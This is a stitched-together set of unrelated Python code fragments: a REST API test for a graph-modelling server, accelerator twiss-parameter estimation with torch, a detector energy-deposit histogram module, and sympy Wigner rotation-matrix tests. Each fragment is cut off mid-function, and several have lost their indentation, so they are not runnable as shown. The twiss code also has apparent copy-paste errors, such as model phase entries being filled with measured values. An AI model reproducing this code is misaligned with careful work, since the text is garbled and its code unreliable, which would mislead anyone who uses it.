    Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
    testResult = True
    createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
    getEntityURL = serverURL + "/modeling/getEntitiesByMetaMemeType/%s" %metaMemePath
    notes = ""
    entityID = None
    try:
        #urllib GET request
        createResponse = urllib.request.urlopen(createEntityURL)
        createResponseJsonB = createResponse.read()
        entityUUIDJson = json.loads(createResponseJsonB)
        entityID = entityUUIDJson["entityUUID"]
    except urllib.error.URLError as e:
        testResult = False
        notes = e.reason
    except Exception as e:
        testResult = False
        # generic exceptions have no .reason attribute; the old handler crashed here
        notes = str(e)
    if testResult != False:
        try:
            #urllib GET request
            getResponse = urllib.request.urlopen(getEntityURL)
            getResponseJsonB = getResponse.read()
            getUUIDJson = json.loads(getResponseJsonB)
            entityIDList = getUUIDJson["entityIDList"]
            if entityID not in entityIDList:
                # The whole point of the test: absence must FAIL it, not just
                # annotate the notes (previously testResult was left True).
                testResult = False
                entityIDListS = ", ".join(entityIDList)
                notes = "Entity %s was %s" %(entityID, entityIDListS)
        except urllib.error.URLError as e:
            testResult = False
            notes = e.reason
        except Exception as e:
            testResult = False
            notes = str(e)
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
    resultSet = []
    testResult = str(testResult)
    expectedResult = str('True')
    results = [1, "Check to see if entity is in list of type", testResult, expectedResult, [notes]]
    resultSet.append(results)
    return resultSet
def testServerAPIAddEntityLink(serverURL = None, memePath = "Graphyne.Generic", linkAttributes = {}, linkType = 1):
"""
Tests the /modeling/addEntityLink REST API call
1 - Create two entities of meme type memePath using /modeling/createEntityFromMeme/<memePath>
2 - Link them via via /modeling/addEntityLink
3 - Should not cause any errors. We'll check to see if they are actually linked via another test
"""
#"NumericValue.nv_intValue_3"
method = moduleName + '.' + '/modeling/createEntityFromMeme/<memePath>'
Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
testResult = True
createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
notes = ""
try:
#create two generic entities
createResponse1 = | |
corrected phases
use_correct_sigma: bool
flag to use corrected phase errors
use_model: bool
flag to use precomputed model data
Returns
-------
None, update self.twiss_from_phase dictionary
"""
self.data_phase = {}
fx = self.fx_correct if use_correct else self.fx
fy = self.fy_correct if use_correct else self.fy
sigma_fx = self.sigma_fx_correct if use_correct_sigma else self.sigma_fx
sigma_fy = self.sigma_fy_correct if use_correct_sigma else self.sigma_fy
ax_m, bx_m = self.model.ax, self.model.bx
ay_m, by_m = self.model.ay, self.model.by
index = self.combo.swapaxes(0, -1)
value, sigma = Decomposition.phase_advance(*index, self.table.nux, fx, error=error, model=False, sigma_frequency=self.table.sigma_nux, sigma_phase=sigma_fx)
fx_ij, fx_ik = value.swapaxes(0, 1)
sx_ij, sx_ik = sigma.swapaxes(0, 1)
value, sigma = Decomposition.phase_advance(*index, self.table.nuy, fy, error=error, model=False, sigma_frequency=self.table.sigma_nuy, sigma_phase=sigma_fy)
fy_ij, fy_ik = value.swapaxes(0, 1)
sy_ij, sy_ik = sigma.swapaxes(0, 1)
if use_model:
fx_m_ij, fx_m_ik = self.fx_ij, self.fx_ik
sx_m_ij, sx_m_ik = self.sigma_fx_ij, self.sigma_fx_ik
fy_m_ij, fy_m_ik = self.fy_ij, self.fy_ik
sy_m_ij, sy_m_ik = self.sigma_fy_ij, self.sigma_fy_ik
else:
value, sigma = Decomposition.phase_advance(*index, self.model.nux, self.model.fx, error=error*model, model=True, sigma_frequency=self.model.sigma_nux, sigma_phase=self.model.sigma_fx)
fx_m_ij, fx_m_ik = value.swapaxes(0, 1)
sx_m_ij, sx_m_ik = sigma.swapaxes(0, 1)
value, sigma = Decomposition.phase_advance(*index, self.model.nuy, self.model.fy, error=error*model, model=True, sigma_frequency=self.model.sigma_nuy, sigma_phase=self.model.sigma_fy)
fy_m_ij, fy_m_ik = value.swapaxes(0, 1)
sy_m_ij, sy_m_ik = sigma.swapaxes(0, 1)
ax, sigma_ax = self.phase_alfa(ax_m, fx_ij, fx_m_ij, fx_ik, fx_m_ik, error=error, model=model, sigma_a_m=self.model.sigma_ax, sigma_f_ij=sx_ij, sigma_f_ik=sx_ik, sigma_f_m_ij=sx_m_ij, sigma_f_m_ik=sx_m_ik)
bx, sigma_bx = self.phase_beta(bx_m, fx_ij, fx_m_ij, fx_ik, fx_m_ik, error=error, model=model, sigma_b_m=self.model.sigma_bx, sigma_f_ij=sx_ij, sigma_f_ik=sx_ik, sigma_f_m_ij=sx_m_ij, sigma_f_m_ik=sx_m_ik)
ay, sigma_ay = self.phase_alfa(ay_m, fy_ij, fy_m_ij, fy_ik, fy_m_ik, error=error, model=model, sigma_a_m=self.model.sigma_ay, sigma_f_ij=sy_ij, sigma_f_ik=sy_ik, sigma_f_m_ij=sy_m_ij, sigma_f_m_ik=sy_m_ik)
by, sigma_by = self.phase_beta(by_m, fy_ij, fy_m_ij, fy_ik, fy_m_ik, error=error, model=model, sigma_b_m=self.model.sigma_by, sigma_f_ij=sy_ij, sigma_f_ik=sy_ik, sigma_f_m_ij=sy_m_ij, sigma_f_m_ik=sy_m_ik)
self.data_phase['fx_ij'], self.data_phase['sigma_fx_ij'], self.data_phase['fx_m_ij'], self.data_phase['sigma_fx_m_ij'] = fx_ij.T, sx_ij.T, fx_m_ij.T, sx_m_ij.T
self.data_phase['fx_ik'], self.data_phase['sigma_fx_ik'], self.data_phase['fx_m_ik'], self.data_phase['sigma_fx_m_ik'] = fx_ik.T, sx_ik.T, fx_m_ik.T, sx_m_ik.T
self.data_phase['fy_ij'], self.data_phase['sigma_fy_ij'], self.data_phase['fy_m_ij'], self.data_phase['sigma_fy_m_ij'] = fy_ij.T, sy_ij.T, fy_ij.T, sy_m_ij.T
self.data_phase['fy_ik'], self.data_phase['sigma_fy_ik'], self.data_phase['fy_m_ik'], self.data_phase['sigma_fy_m_ik'] = fy_ik.T, sy_ik.T, fy_ik.T, sy_m_ik.T
self.data_phase['ax'], self.data_phase['sigma_ax'], self.data_phase['bx'], self.data_phase['sigma_bx'] = ax.T, sigma_ax.T, bx.T, sigma_bx.T
self.data_phase['ay'], self.data_phase['sigma_ay'], self.data_phase['by'], self.data_phase['sigma_by'] = ay.T, sigma_ay.T, by.T, sigma_by.T
def filter_twiss(self, plane:str = 'x', *,
                 phase:dict={'use': True, 'threshold': 10.00},
                 model:dict={'use': True, 'threshold': 00.50},
                 value:dict={'use': True, 'threshold': 00.50},
                 sigma:dict={'use': True, 'threshold': 00.25},
                 limit:dict={'use': True, 'threshold': 05.00}) -> dict:
    """
    Filter twiss for given data plane and cleaning options.

    Parameters
    ----------
    plane: str
        data plane ('x' or 'y')
    phase: dict
        clean based on advance phase data
        used if 'use' is True, remove combinations with absolute value of phase advance cotangents above threshold value
    model: dict
        clean based on phase advance proximity to model
        used if 'use' is True, remove combinations with (x - x_model)/x_model > threshold value
    value: dict
        clean based on estimated twiss beta error value
        used if 'use' is True, remove combinations with x/sigma_x < 1/threshold value
    sigma: dict
        clean based on estimated phase advance error value
        used if 'use' is True, remove combinations with x/sigma_x < 1/threshold value
    limit: dict
        clean outliers outside scaled interval
        used if 'use' is True

    Returns
    -------
    mask (torch.Tensor)

    Raises
    ------
    ValueError
        if plane is not 'x' or 'y'
    """
    size, length, *_ = self.index.shape
    mask = torch.ones((size, length), device=self.device).to(torch.bool)
    if plane == 'x':
        a_m, b_m = self.model.ax.reshape(-1, 1), self.model.bx.reshape(-1, 1)
        a, b, sigma_a, sigma_b = self.data_phase['ax'], self.data_phase['bx'], self.data_phase['sigma_ax'], self.data_phase['sigma_bx']
        f_ij, sigma_f_ij, f_m_ij, sigma_f_m_ij = self.data_phase['fx_ij'], self.data_phase['sigma_fx_ij'], self.data_phase['fx_m_ij'], self.data_phase['sigma_fx_m_ij']
        f_ik, sigma_f_ik, f_m_ik, sigma_f_m_ik = self.data_phase['fx_ik'], self.data_phase['sigma_fx_ik'], self.data_phase['fx_m_ik'], self.data_phase['sigma_fx_m_ik']
    elif plane == 'y':
        a_m, b_m = self.model.ay.reshape(-1, 1), self.model.by.reshape(-1, 1)
        a, b, sigma_a, sigma_b = self.data_phase['ay'], self.data_phase['by'], self.data_phase['sigma_ay'], self.data_phase['sigma_by']
        f_ij, sigma_f_ij, f_m_ij, sigma_f_m_ij = self.data_phase['fy_ij'], self.data_phase['sigma_fy_ij'], self.data_phase['fy_m_ij'], self.data_phase['sigma_fy_m_ij']
        f_ik, sigma_f_ik, f_m_ik, sigma_f_m_ik = self.data_phase['fy_ik'], self.data_phase['sigma_fy_ik'], self.data_phase['fy_m_ik'], self.data_phase['sigma_fy_m_ik']
    else:
        # previously an unknown plane fell through to a NameError below
        raise ValueError(f'unknown data plane: {plane}')
    if phase['use']:
        cot_ij, cot_m_ij = torch.abs(1.0/torch.tan(f_ij)), torch.abs(1.0/torch.tan(f_m_ij))
        # BUG FIX: the ik pair previously recomputed the ij cotangents
        # (copy-paste of f_ij/f_m_ij); it must use f_ik/f_m_ik.
        cot_ik, cot_m_ik = torch.abs(1.0/torch.tan(f_ik)), torch.abs(1.0/torch.tan(f_m_ik))
        mask *= phase['threshold'] > cot_ij
        mask *= phase['threshold'] > cot_m_ij
        mask *= phase['threshold'] > cot_ik
        mask *= phase['threshold'] > cot_m_ik
    if model['use']:
        mask *= model['threshold'] > torch.abs((f_ij - f_m_ij)/f_m_ij)
        mask *= model['threshold'] > torch.abs((f_ik - f_m_ik)/f_m_ik)
    if value['use']:
        mask *= value['threshold'] > torch.abs((b - b_m)/b_m)
    if sigma['use']:
        mask *= 1/sigma['threshold'] < torch.abs(f_ij/sigma_f_ij)
        mask *= 1/sigma['threshold'] < torch.abs(f_ik/sigma_f_ik)
    if limit['use']:
        factor = torch.tensor(limit['threshold'], dtype=self.dtype, device=self.device)
        mask *= threshold(standardize(a, center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
        mask *= threshold(standardize(b, center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
    return mask
def mask_range(self, limit:tuple) -> torch.Tensor:
    """
    Generate weight mask based on given range limit.

    Parameters
    ----------
    limit: tuple
        range limit to use, (min, max), 1 <= min <= max, min is excluded, for full range min==max

    Returns
    -------
    weight mask (torch.Tensor)
    """
    def _bounds(pair):
        # Column bounds for a (min, max) limit pair, or None when min > max.
        # count[i] is the cumulative number of combinations up to limit i+1,
        # i.e. value*(2*value - 1) pairs for each limit value.
        count = torch.tensor([value*(2*value - 1) for value in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
        lower, upper = pair
        if lower == upper:
            # full range up to upper
            return 0, count[upper - 1]
        if lower < upper:
            # partial range; the lower limit itself is excluded
            return count[lower - 1], count[upper - 1]
        return None
    size, length, *_ = self.shape
    mask = torch.zeros((size, length), dtype=torch.int64, device=self.device)
    # Mark the requested range with ones (previously this bound computation
    # was duplicated inline for both the argument and self.limit).
    span = _bounds(limit)
    if span is not None:
        start, stop = span
        mask[:, start:stop] = 1
    # Trim the mask columns to the instance's own configured limit range.
    span = _bounds(self.limit)
    if span is not None:
        start, stop = span
        mask = mask[:, start:stop]
    return mask
def mask_location(self, table:list) -> torch.Tensor:
    """
    Generate weight mask that excludes combinations involving given locations.

    Parameters
    ----------
    table: list
        list of locations to remove

    Returns
    -------
    weight mask (torch.Tensor), True for combinations free of all listed locations
    """
    size, length, *_ = self.combo.shape
    # Start by keeping every combination.
    mask = torch.ones((size, length), dtype=torch.bool, device=self.device)
    for location in table:
        _, other = self.index.swapaxes(0, -1)
        # True where neither index of the combination matches the location.
        keep = torch.mul(*(other != location).swapaxes(0, 1)).T
        # BUG FIX: accumulate with logical AND; the previous equality chain
        # (mask = (mask == other) followed by a final logical_not) behaved
        # like XNOR and mishandled tables with more than one location.
        mask = mask.logical_and(keep)
    return mask
def mask_distance(self, function) -> torch.Tensor:
    """
    Generate weight mask by applying given function to distance data.

    Note, the docstring previously described a "range limit" (copy-paste
    from mask_range); this method masks based on distance data instead.

    Parameters
    ----------
    function: Callable
        function to apply to distance data

    Returns
    -------
    weight mask (torch.Tensor)
    """
    # Apply the function to each distance row, then replicate the result
    # once per signal so the mask matches the per-signal layout.
    mask = torch.stack([function(distance) for distance in self.distance])
    return torch.stack([mask for _ in range(self.size)])
def process_twiss(self, plane:str='x', *,
                  weight:bool=True, mask:torch.Tensor=None) -> dict:
    """
    Process twiss data.

    Parameters
    ----------
    plane: str
        data plane ('x' or 'y')
    weight: bool
        flag to use weights (inverse sigma squared); also caches results on self
    mask: torch.Tensor
        mask

    Returns
    -------
    twiss data (dict)
        dict_keys(['value_a', 'sigma_a', 'error_a', 'value_b', 'sigma_b', 'error_b'])
    """
    result = {}
    # BUG FIX: identity check; `mask == None` on a tensor argument is
    # elementwise (or raises on truth-testing), not a None test.
    if mask is None:
        size, length, *_ = self.index.shape
        mask = torch.ones((size, length), device=self.device).to(torch.bool)
    if plane == 'x':
        a, sigma_a, a_m = self.data_phase['ax'], self.data_phase['sigma_ax'], self.model.ax
        b, sigma_b, b_m = self.data_phase['bx'], self.data_phase['sigma_bx'], self.model.bx
    if plane == 'y':
        a, sigma_a, a_m = self.data_phase['ay'], self.data_phase['sigma_ay'], self.model.ay
        b, sigma_b, b_m = self.data_phase['by'], self.data_phase['sigma_by'], self.model.by
    def _estimate(data, sigma, model_value):
        # Weighted center/spread and relative error against the model value.
        if weight:
            w = (mask.to(self.dtype)/sigma**2).nan_to_num(posinf=0.0, neginf=0.0)
        else:
            w = mask
        center = weighted_mean(data, weight=w)
        spread = weighted_variance(data, weight=w, center=center).sqrt()
        return center, spread, (center - model_value)/model_value
    result['value_a'], result['sigma_a'], result['error_a'] = _estimate(a, sigma_a, a_m)
    result['value_b'], result['sigma_b'], result['error_b'] = _estimate(b, sigma_b, b_m)
    if not weight:
        # NOTE(review): as in the original, the unweighted path does NOT
        # cache results on self - confirm this asymmetry is intentional.
        return result
    if plane == 'x':
        self.ax, self.sigma_ax = result['value_a'], result['sigma_a']
        self.bx, self.sigma_bx = result['value_b'], result['sigma_b']
    if plane == 'y':
        self.ay, self.sigma_ay = result['value_a'], result['sigma_a']
        self.by, self.sigma_by = result['value_b'], result['sigma_b']
    return result
def get_twiss_from_data(self, n:int, x:torch.Tensor, y:torch.Tensor, *,
refit:bool=False, factor:float=5.0,
level:float=1.0E-6, sigma_x:torch.Tensor=None, sigma_y:torch.Tensor=None,
ax:torch.Tensor=None, bx:torch.Tensor=None, ay:torch.Tensor=None, by:torch.Tensor=None,
transport:torch.Tensor=None, **kwargs) -> dict:
"""
Estimate twiss from tbt data using ODR fit.
Note, if no initial guesses for twiss and/or transport are given, model values will be used
This method is sensitive to noise and calibration errors
Parameters
----------
n: int
number of turns to use
x: torch.Tensor
x data
y: torch.Tensor
y data
refit: bool
flag to refit twiss using estimated invariants
factor: float
threshold factor for invariants spread
level: float
default noise level
sigma_x: torch.Tensor
x noise sigma for each signal
sigma_y: torch.Tensor
y noise sigma for each signal
ax, bx, ay, by: torch.Tensor
initial guess for twiss parameters at monitor locations
transport: torch.Tensor
transport matrices between monitor locations
Returns
-------
fit result (dict)
dict_keys(['jx', 'ax', 'bx', 'sigma_jx', 'sigma_ax', 'sigma_bx', 'jy', 'ay', 'by', 'sigma_jy', 'sigma_ay', 'sigma_by', 'mux', 'muy'])
"""
if ax is None:
ax = self.model.ax[self.model.monitor_index].cpu().numpy()
else:
ax = ax.cpu().numpy()
if bx is None:
bx = self.model.bx[self.model.monitor_index].cpu().numpy()
else:
bx = bx.cpu().numpy()
if ay is None:
ay = | |
<filename>analysis/calc.py
"""Energy calculations and histograms."""
import abc
import collections
import datetime
import functools
import itertools
import math
import os
import pickle
import warnings
import numpy
import pandas
from matplotlib import pyplot
# Use seaborn's plotting styles when available; otherwise fall back to
# matplotlib's defaults and emit a warning (seaborn is optional here).
try:
    import seaborn
    seaborn.set()
except ModuleNotFoundError:
    msg = "Seaborn wasn't found."
    warnings.warn(msg)
# Energy-z histogram z-limits for the 8 by 4 plate arrangements. The
# z-limits for other plate arrangements are adjusted in increments equal
# to the `_plate_separation`.
_z_lims_8_4 = (-65, 95)
# Spacing between plates; presumably in `_default_length_units` (mm) — TODO confirm.
_plate_separation = 4.15 + 3.5
# Energy-z histogram energy-limits (y-axis), per beam energy.
_e_lims_200 = (0, 400) # for 200 GeV
_e_lims_350 = (0, 650) # for 350 GeV
# Per-tube energy limits: overall limits scaled down by a factor of 25
# (presumably the number of tubes sharing the total — TODO confirm).
_tube_e_lims_200 = tuple(lim / 25 for lim in _e_lims_200)
_tube_e_lims_350 = tuple(lim / 25 for lim in _e_lims_350)
_default_bin_density = 10   # histogram bins per unit length
_default_dpi = 300          # image resolution for saved figures
_default_length_units = 'mm'
_default_energy_units = 'MeV'
# Just used to split energy-z plots.
_PEEK_z_lims = (-43.5 / 2, 43.5 / 2)
_default_tube_z_lims = (-35 / 2, 35 / 2)
# Convert the _default_middle_z_lims to integers so that the plot
# tick labels are displayed without decimals.
_default_middle_z_lims = tuple(int(lim) for lim in (-8 / 2, 8 / 2))
_default_xy_lims = 2 * ((-3, 3),)          # ((-3, 3), (-3, 3)) for x and y
_default_xy_hist_z_lims = _default_middle_z_lims
_image_format = 'jpg'
_data_format = 'csv'
# NOTE(review): public name (no leading underscore), unlike the other module
# defaults; used by plotting code elsewhere in the module.
linewidth = 0.5
class Calc(abc.ABC):
    """
    Abstract base for one kind of calculation and the presentation of
    its results.

    Attributes:
        resultss: Accumulated results. A pandas DataFrame in this base
            class; subclasses may substitute another container.
        save_dir: Directory where output is written, or None when the
            owning piece has no output directory.
        save_name: Base name for saved files, or None when saving is
            disabled.
    """

    def __init__(self, piece):
        self._piece = piece
        self.resultss = pandas.DataFrame()
        # Saving is enabled only when the owning Piece has an output
        # directory configured.
        enabled = bool(piece.out_dir)
        self.save_dir = piece.out_dir if enabled else None
        self.save_name = piece.name if enabled else None

    def __repr__(self):
        return repr(self.resultss)

    def get(self, i=None):
        """
        Return the ith set of results; with no index, assert that
        exactly one entry exists and return it.

        :param i: The index of the results to get.
        :type i: int or None
        :return: Results.
        :rtype:
        """
        if i is None:
            self._assert_single_entry()
            i = 0
        return self.resultss.loc[i]

    def add_data(self, data):
        """
        Derive results from hits data and store them.

        :param data: Hits data.
        :type data: pandas.DataFrame
        :return:
        :rtype:
        """
        results = self._data2results(data)
        self.add_results(results)

    def add_results(self, results):
        """
        Store already-computed results after validating them.

        :param results: Results to add.
        :type results: pandas.Series or dict or collections.OrderedDict
        :return:
        :rtype: None
        """
        self._check_results(results)
        self.resultss = _ordered_append(self.resultss, results)

    def save(self):
        """
        Write results to a csv file when save_dir is configured.

        :return: Path to saved results file, or None when saving is
            disabled.
        :rtype: str
        """
        if not self.save_dir:
            return None
        filepath = os.path.join(
            self.save_dir, f'{self.save_name}.{_data_format}'
        )
        return save_dataframe(self.resultss, filepath)

    def pickle_save(self, filepath=None):
        """Pickle this object to disk. A no-op when `filepath` is not
        given and `self.save_dir` is not set.

        :param filepath: Location to save. If not given, use
            `self.save_dir`.
        """
        target = filepath
        if not target:
            if not self.save_dir:
                return
            target = os.path.join(self.save_dir, self.save_name + '.p')
        with open(target, 'wb') as file:
            pickle.dump(self, file)

    def _assert_single_entry(self):
        """Make sure only one set of results has been added."""
        assert len(self.resultss) == 1, \
            "This Calc container does not have a single entry."

    def _assert_multiple_entries(self):
        """Make sure more than one set of results has been added."""
        assert len(self.resultss) > 1, \
            "This Calc container does not have more than one set of" \
            " results."

    def _assert_nonempty(self):
        """Make sure at least one set of results has been added."""
        assert len(self.resultss) >= 1, \
            "This Calc container is empty."

    @abc.abstractmethod
    def _data2results(self, data):
        """
        Turn hits data into calculation results.

        :param data: Hits data.
        :return: Calc results.
        """

    @abc.abstractmethod
    def _check_results(self, results):
        """Validate results before they are stored."""
class Numbers(Calc):
    """
    The numbers don't lie.

    Computes scalar summaries (energy-deposit sums over z sections) from
    hits data and records them, optionally with tag columns, for writing
    to file.
    """

    def add_data(self, data, tags=None):
        # Unlike the base class, allow tag values (e.g. run/event ids) to
        # ride along with each results entry.
        results = self._data2results(data, tags)
        self.add_results(results)

    def append_mean_and_uncertainties(
            self, mean_tags=None, std_tags=None, sem_tags=None
    ):
        """
        Append mean, standard deviation and standard error entries to
        the collection of results.

        :param mean_tags: Tags to use for the new means entry.
        :type mean_tags: dict or collections.OrderedDict or None
        :param std_tags: Tags to use for the new standard deviation
            entry.
        :type std_tags: dict or collections.OrderedDict or None
        :param sem_tags: Tags to use for the new standard error in the
            mean entry.
        :type sem_tags: dict or collections.OrderedDict or None
        :return: The new mean, standard deviation, and standard error.
        :rtype:
        """
        # Pandas' std function gives NANs for DataFrames with only one
        # entry, so require at least two.
        self._assert_multiple_entries()
        mean_row = self.resultss.mean()
        std_row = self.resultss.std()
        sem_row = std_row / math.sqrt(len(self.resultss))  # standard error
        new_rows = [mean_row, std_row, sem_row]
        for i, tags in enumerate((mean_tags, std_tags, sem_tags)):
            if tags:
                # Tag values take precedence over same-named result columns.
                new_rows[i] = pandas.Series(tags).combine_first(new_rows[i])
            self.add_results(new_rows[i])
        return new_rows

    def _data2results(self, data, tags=None):
        """
        :param data:
        :type data:
        :param tags: Extra result values for tagging an entry (e.g. with
            its event and run).
        :type tags: dict or collections.OrderedDict or None
        :return:
        :rtype:
        """
        if tags:
            new_results = collections.OrderedDict(tags)
        else:
            new_results = collections.OrderedDict()
        new_results.update(self.__split_z(data))
        return new_results

    def _check_results(self, results):
        assert len(results) <= 9, "Tried to add funny results."

    @staticmethod
    def __split_z(data):
        """
        Calculate energy deposit sums on sections of the data split up
        along z.

        :param data: Hits data.
        :type data: pandas.DataFrame
        :return: Calculation results.
        :rtype: dict
        """
        z = data.z
        in_tube = (_default_tube_z_lims[0] <= z) & (z <= _default_tube_z_lims[1])
        in_middle = (_default_middle_z_lims[0] <= z) & (z <= _default_middle_z_lims[1])
        e_dep = data.energy_deposit
        return {
            'full_e_dep': e_dep.sum(),
            'tube_e_dep': e_dep[in_tube].sum(),
            'middle_e_dep': e_dep[in_middle].sum(),
        }

    @staticmethod
    def __tubes(data):
        """TODO: Document and organize this."""
        offset = 7.5 / 4
        # TODO: Change default to self (probably don't need to do this).
        in_middle = (_default_middle_z_lims[0] < data.z) & (data.z < _default_middle_z_lims[1])
        data = data[in_middle]
        # Quadrant split; note the x threshold is -offset on the bottom
        # half but +offset on the top half.
        is_bottom = data.y <= 0
        is_top = data.y > 0
        e_dep = data.energy_deposit
        return {
            'top_right': e_dep[is_top & (data.x > offset)].sum(),
            'top_left': e_dep[is_top & (data.x <= offset)].sum(),
            'bottom_left': e_dep[is_bottom & (data.x <= -offset)].sum(),
            'bottom_right': e_dep[is_bottom & (data.x > -offset)].sum()
        }
class Histogram(Calc):
    """
    Base histogram.

    Attributes:
        bin_density: E.g. bins per mm.
        dpi: Dots per inch for images.
        title: The plot title.

    TODO: Add the option to close all the plot figures created.
    """

    def __init__(
            self,
            piece,
            title=None,
            bin_density=None,
            dpi=None,
            energy_units=None,
            length_units=None
    ):
        super().__init__(piece)
        # Fall back to module defaults for any attribute not supplied.
        self.title = title if title else self._default_title
        self.bin_density = bin_density if bin_density else _default_bin_density
        self.dpi = dpi if dpi else _default_dpi
        self.energy_units = energy_units if energy_units else _default_energy_units
        self.length_units = length_units if length_units else _default_length_units

    def save_fig(self, fig, file_suffix):
        """
        Save a figure to a new file if save_dir is set.

        :param fig: The figure to save.
        :type fig: figure
        :param file_suffix: Added to the end of the saved filename.
        :type file_suffix: str or None
        :return: File path of the saved figure.
        :rtype: str
        """
        if not self.save_dir:
            return None
        if file_suffix:
            stem = '-'.join((self.save_name, file_suffix))
        else:
            stem = self.save_name
        filepath = os.path.join(self.save_dir, f'{stem}.{_image_format}')
        fig.savefig(
            filepath, dpi=self.dpi, format=_image_format, bbox_inches='tight'
        )
        return filepath

    def _to_density(self, sums):
        """
        Convert values from units of energy/bin to units of
        energy/distance.

        :param sums: Values to convert.
        :type sums: numpy.ndarray
        :return: Converted values.
        :rtype: numpy.ndarray
        """
        return self.bin_density * sums

    @property
    def _default_title(self):
        """Default plot title. Concrete subclasses must provide one."""
        raise NotImplementedError

    @abc.abstractmethod
    def plot_single(self, i=None, save=True):
        """
        Plot the ith set of sums. If i isn't given, assume there is only
        one set of sums and plot it.

        :param save: Save to file with the standard filename if True.
        :type save: bool
        :param i: Index of the sums.
        :type i: int
        :return: New figure and axis/axes.
        :rtype: tuple
        """

    @abc.abstractmethod
    def plot_means(self):
        """
        Plot the mean, and maybe the standard deviation, of all results.

        :return: New figure and axis/axes.
        :rtype: tuple
        """

    @abc.abstractmethod
    def _make_fig_and_axes(self):
        """
        Make a new labeled figure and axis/axes.

        :return: The figure and axis/axes.
        :rtype: tuple
        """
class EnergyVsZ(Histogram):
"""
Histograms of energy deposit vs. z.
Attributes:
e_lims: Overall energy/y-axis limits.
tube_e_lims: Tube energy/y-axis limits.
z_lims: Overall z limits.
tube_z_lims: Tube z limits.
middle_z_lims: Tube middle section z limits.
"""
_default_title = 'Energy vs. z.'
def __init__(
self,
piece,
title=None,
e_lims=None,
tube_e_lims=None,
z_lims=None,
tube_z_lims=None,
middle_z_lims=None,
**kwargs
):
super().__init__(piece, title, **kwargs)
# | |
== -1/2
assert Rotation.d(2, 2, -2, pi/2).doit() == 1/4
assert Rotation.d(2, 1, 2, pi/2).doit() == 1/2
assert Rotation.d(2, 1, 1, pi/2).doit() == -1/2
assert Rotation.d(2, 1, 0, pi/2).doit() == 0
assert Rotation.d(2, 1, -1, pi/2).doit() == 1/2
assert Rotation.d(2, 1, -2, pi/2).doit() == -1/2
assert Rotation.d(2, 0, 2, pi/2).doit() == sqrt(6)/4
assert Rotation.d(2, 0, 1, pi/2).doit() == 0
assert Rotation.d(2, 0, 0, pi/2).doit() == -1/2
assert Rotation.d(2, 0, -1, pi/2).doit() == 0
assert Rotation.d(2, 0, -2, pi/2).doit() == sqrt(6)/4
assert Rotation.d(2, -1, 2, pi/2).doit() == 1/2
assert Rotation.d(2, -1, 1, pi/2).doit() == 1/2
assert Rotation.d(2, -1, 0, pi/2).doit() == 0
assert Rotation.d(2, -1, -1, pi/2).doit() == -1/2
assert Rotation.d(2, -1, -2, pi/2).doit() == -1/2
assert Rotation.d(2, -2, 2, pi/2).doit() == 1/4
assert Rotation.d(2, -2, 1, pi/2).doit() == 1/2
assert Rotation.d(2, -2, 0, pi/2).doit() == sqrt(6)/4
assert Rotation.d(2, -2, -1, pi/2).doit() == 1/2
assert Rotation.d(2, -2, -2, pi/2).doit() == 1/4
def test_rotation_d():
# Symbolic tests
# j = 1/2
assert Rotation.D(S(1)/2, S(1)/2, S(1)/2, alpha, beta, gamma).doit() == \
cos(beta/2)*exp(-I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(1)/2, S(1)/2, -S(1)/2, alpha, beta, gamma).doit() == \
-sin(beta/2)*exp(-I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(1)/2, -S(1)/2, S(1)/2, alpha, beta, gamma).doit() == \
sin(beta/2)*exp(I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(1)/2, -S(1)/2, -S(1)/2, alpha, beta, gamma).doit() == \
cos(beta/2)*exp(I*alpha/2)*exp(I*gamma/2)
# j = 1
assert Rotation.D(1, 1, 1, alpha, beta, gamma).doit() == \
(1 + cos(beta))/2*exp(-I*alpha)*exp(-I*gamma)
assert Rotation.D(1, 1, 0, alpha, beta, gamma).doit() == -sin(
beta)/sqrt(2)*exp(-I*alpha)
assert Rotation.D(1, 1, -1, alpha, beta, gamma).doit() == \
(1 - cos(beta))/2*exp(-I*alpha)*exp(I*gamma)
assert Rotation.D(1, 0, 1, alpha, beta, gamma).doit() == \
sin(beta)/sqrt(2)*exp(-I*gamma)
assert Rotation.D(1, 0, 0, alpha, beta, gamma).doit() == cos(beta)
assert Rotation.D(1, 0, -1, alpha, beta, gamma).doit() == \
-sin(beta)/sqrt(2)*exp(I*gamma)
assert Rotation.D(1, -1, 1, alpha, beta, gamma).doit() == \
(1 - cos(beta))/2*exp(I*alpha)*exp(-I*gamma)
assert Rotation.D(1, -1, 0, alpha, beta, gamma).doit() == \
sin(beta)/sqrt(2)*exp(I*alpha)
assert Rotation.D(1, -1, -1, alpha, beta, gamma).doit() == \
(1 + cos(beta))/2*exp(I*alpha)*exp(I*gamma)
# j = 3/2
assert Rotation.D(S(3)/2, S(3)/2, S(3)/2, alpha, beta, gamma).doit() == \
(3*cos(beta/2) + cos(3*beta/2))/4*exp(-3*I*alpha/2)*exp(-3*I*gamma/2)
assert Rotation.D(S(3)/2, S(3)/2, S(1)/2, alpha, beta, gamma).doit() == \
-sqrt(3)*(sin(beta/2) + sin(3*beta/2))/4*exp(-3*I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(3)/2, S(3)/2, -S(1)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(cos(beta/2) - cos(3*beta/2))/4*exp(-3*I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(3)/2, S(3)/2, -S(3)/2, alpha, beta, gamma).doit() == \
(-3*sin(beta/2) + sin(3*beta/2))/4*exp(-3*I*alpha/2)*exp(3*I*gamma/2)
assert Rotation.D(S(3)/2, S(1)/2, S(3)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(sin(beta/2) + sin(3*beta/2))/4*exp(-I*alpha/2)*exp(-3*I*gamma/2)
assert Rotation.D(S(3)/2, S(1)/2, S(1)/2, alpha, beta, gamma).doit() == \
(cos(beta/2) + 3*cos(3*beta/2))/4*exp(-I*alpha/2)*exp(-I*gamma/2)
